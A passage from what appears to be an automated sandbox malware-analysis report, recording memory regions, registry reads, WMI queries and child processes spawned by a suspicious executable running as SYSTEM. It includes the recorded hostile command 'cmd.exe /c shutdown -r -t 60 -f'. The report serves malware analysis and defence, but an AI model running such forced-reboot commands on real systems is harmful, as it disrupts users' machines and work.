private_0x0000000000790000 0x00790000 0x0079ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000007a0000 0x007a0000 0x00927fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000930000 0x00930000 0x00ab0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ac0000 0x00ac0000 0x01ebffff Pagefile Backed Memory Readable True False False -
private_0x0000000001ec0000 0x01ec0000 0x0202ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x01ec0000 0x01f7ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000001fa0000 0x01fa0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000001ff0000 0x01ff0000 0x0202ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02030000 0x022fefff Memory Mapped File Readable False False False -
private_0x0000000002300000 0x02300000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002300000 0x02300000 0x023fffff Private Memory Readable, Writable True False False -
private_0x0000000002430000 0x02430000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x0262ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x025dffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x0252ffff Private Memory Readable, Writable True False False -
private_0x0000000002490000 0x02490000 0x024cffff Private Memory Readable, Writable True False False -
private_0x00000000024f0000 0x024f0000 0x0252ffff Private Memory Readable, Writable True False False -
private_0x00000000025a0000 0x025a0000 0x025dffff Private Memory Readable, Writable True False False -
private_0x00000000025f0000 0x025f0000 0x0262ffff Private Memory Readable, Writable True False False -
private_0x0000000002630000 0x02630000 0x02a2ffff Private Memory Readable, Writable True False False -
private_0x0000000002a30000 0x02a30000 0x02bdffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002a30000 0x02a30000 0x02b0efff Pagefile Backed Memory Readable True False False -
private_0x0000000002b20000 0x02b20000 0x02b5ffff Private Memory Readable, Writable True False False -
private_0x0000000002ba0000 0x02ba0000 0x02bdffff Private Memory Readable, Writable True False False -
fastprox.dll 0x73dc0000 0x73e55fff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x73e60000 0x73f92fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x73fa0000 0x73ffbfff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x74240000 0x74257fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x74260000 0x74269fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x74270000 0x74277fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x74280000 0x7428cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x74290000 0x742c4fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x743e0000 0x743eefff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74620000 0x7462dfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a90000 0x74a96fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74aa0000 0x74abbfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74ac0000 0x74b03fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
COM (5)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\YKYD69Q\ROOT\CIMV2 True 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (3)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\kernel32.dll base_address = 0x74cb0000 True 1
Fn
Get Handle c:\windows\syswow64\wbem\wmic.exe base_address = 0x310000 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x74cda84f True 1
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Time type = System Time, time = 2018-05-29 01:43:19 (UTC) True 1
Fn
Get Time type = Ticks, time = 312017 True 1
Fn
Get Time type = Local Time, time = 2018-05-29 01:43:21 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Fn
Process #12: cmd.exe
57 0
»
Information Value
ID #12
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:04:53, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0x554
Parent PID 0x870 (c:\users\public\rt0fv0ph.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 124
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x0012ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x002cffff Private Memory Readable, Writable True False False -
locale.nls 0x002d0000 0x00336fff Memory Mapped File Readable False False False -
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x00000000005d0000 0x005d0000 0x005dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x00767fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d00000 0x01d00000 0x02042fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02050000 0x0231efff Memory Mapped File Readable False False False -
cmd.exe 0x4a510000 0x4a55bfff Memory Mapped File Readable, Writable, Executable True False False -
winbrand.dll 0x73a90000 0x73a96fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\shutdown.exe os_pid = 0xb14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a510000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74cb0000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x74cda84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x74ce3b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x74cc4a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74cda79d True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-05-29 01:43:23 (UTC) True 1
Fn
Get Time type = Ticks, time = 315278 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #13: iexplore.exe
0 0
»
Information Value
ID #13
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:04:54, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:00:01
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xb08
Parent PID 0x870 (c:\users\public\rt0fv0ph.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B0C
0x A00
0x 92C
0x 954
0x 9D0
0x 57C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False -
iexplore.exe.mui 0x00110000 0x00111fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00140000 0x00140fff Memory Mapped File Readable False False False -
private_0x0000000000150000 0x00150000 0x0015ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x001a0000 0x001abfff Memory Mapped File Readable, Writable True False False -
index.dat 0x001b0000 0x001b7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x001c0000 0x001cbfff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000250000 0x00250000 0x0028ffff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0058ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x005cffff Private Memory Readable, Writable True False False -
private_0x00000000005d0000 0x005d0000 0x0060ffff Private Memory Readable, Writable True False False -
private_0x0000000000630000 0x00630000 0x0066ffff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x0080ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000810000 0x00810000 0x00997fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009a0000 0x009a0000 0x00b20fff Pagefile Backed Memory Readable True False False -
private_0x0000000000b70000 0x00b70000 0x00baffff Private Memory Readable, Writable True False False -
private_0x0000000000c70000 0x00c70000 0x00c7ffff Private Memory Readable, Writable True False False -
private_0x0000000000ce0000 0x00ce0000 0x00d1ffff Private Memory Readable, Writable True False False -
iexplore.exe 0x00d40000 0x00de5fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000df0000 0x00df0000 0x021effff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x021f0000 0x024befff Memory Mapped File Readable False False False -
private_0x0000000002530000 0x02530000 0x0262ffff Private Memory Readable, Writable True False False -
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True False False -
private_0x0000000002990000 0x02990000 0x02a8ffff Private Memory Readable, Writable True False False -
private_0x0000000002b10000 0x02b10000 0x02c0ffff Private Memory Readable, Writable True False False -
private_0x0000000002cb0000 0x02cb0000 0x02daffff Private Memory Readable, Writable True False False -
ieframe.dll 0x71e40000 0x728bffff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73c30000 0x73c6bfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74440000 0x74499fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x74610000 0x74617fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74620000 0x7462dfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74a40000 0x74a4ffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a90000 0x74a96fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74aa0000 0x74abbfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74ac0000 0x74b03fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
